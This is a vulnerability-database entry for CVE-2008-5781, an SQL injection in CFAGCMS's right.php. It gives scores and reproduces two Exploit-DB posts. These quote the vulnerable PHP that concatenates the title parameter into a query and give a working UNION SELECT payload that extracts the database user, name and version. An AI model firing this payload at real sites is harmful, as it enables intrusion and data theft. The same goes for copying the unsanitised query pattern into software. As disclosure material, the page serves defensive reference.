CVE-2008-5781
published 2008-12-30CVE-2008-5781: SQL injection vulnerability in right.php in Cant Find A Gaming CMS (CFAGCMS) 1.0 Beta 1 allows remote attackers to execute arbitrary SQL commands via the title…
PriorityP340high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.02%
59.0th percentile
SQL injection vulnerability in right.php in Cant Find A Gaming CMS (CFAGCMS) 1.0 Beta 1 allows remote attackers to execute arbitrary SQL commands via the title parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cfagcms | cfagcms | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
CFAGCMS - SQL Injection
exploitdb·2009-12-19
CVE-2008-5781 CFAGCMS - SQL Injection
CFAGCMS - SQL Injection
---
################################################################################
## Exploit Title: CFAGCMS SQL Injection Exploit ##
## Date: 20-12-2009 ##
## Author: cr4wl3r ##
## Software Link: http://sourceforge.net/project/showfiles.php?group_id=197936##
## Version: N/A ##
## Tested on: GNU/LINUX ##
################################################################################
~ Code [right.php]
$title = $_GET['title'];
$query = "SELECT * FROM pages WHERE title = '".$title."'";
$result = mysql_query($query);
~ PoC
[cfagcms_path]/right.php?title=[SQL]
Exploit-DB
CFAGCMS 1 - SQL Injection
exploitdb·2008-12-15
CVE-2008-5781 CFAGCMS 1 - SQL Injection
CFAGCMS 1 - SQL Injection
---
cfagcms Beta 1 sql inj.
download: http://mesh.dl.sourceforge.net/sourceforge/cfagcms/cfagcms.zip
Discovered By: ZoRLu
z0rlu.blogspot.com
[email protected]
date: 23.10.2008
N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
exploit:
http://localhost/cfagcms/right.php?title=[SQL]
[SQL]=
ZoRLu'+union+select+0,concat(user(),0x3a,database(),0x3a,version()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*
thanks: str0ke
a.q kpss
# milw0rm.com [2008-12-15]
No writeups or analysis indexed.
http://securityreason.com/securityalert/4850http://www.securityfocus.com/bid/32851https://exchange.xforce.ibmcloud.com/vulnerabilities/47358https://www.exploit-db.com/exploits/7483http://securityreason.com/securityalert/4850http://www.securityfocus.com/bid/32851https://exchange.xforce.ibmcloud.com/vulnerabilities/47358https://www.exploit-db.com/exploits/7483
2008-12-30
Published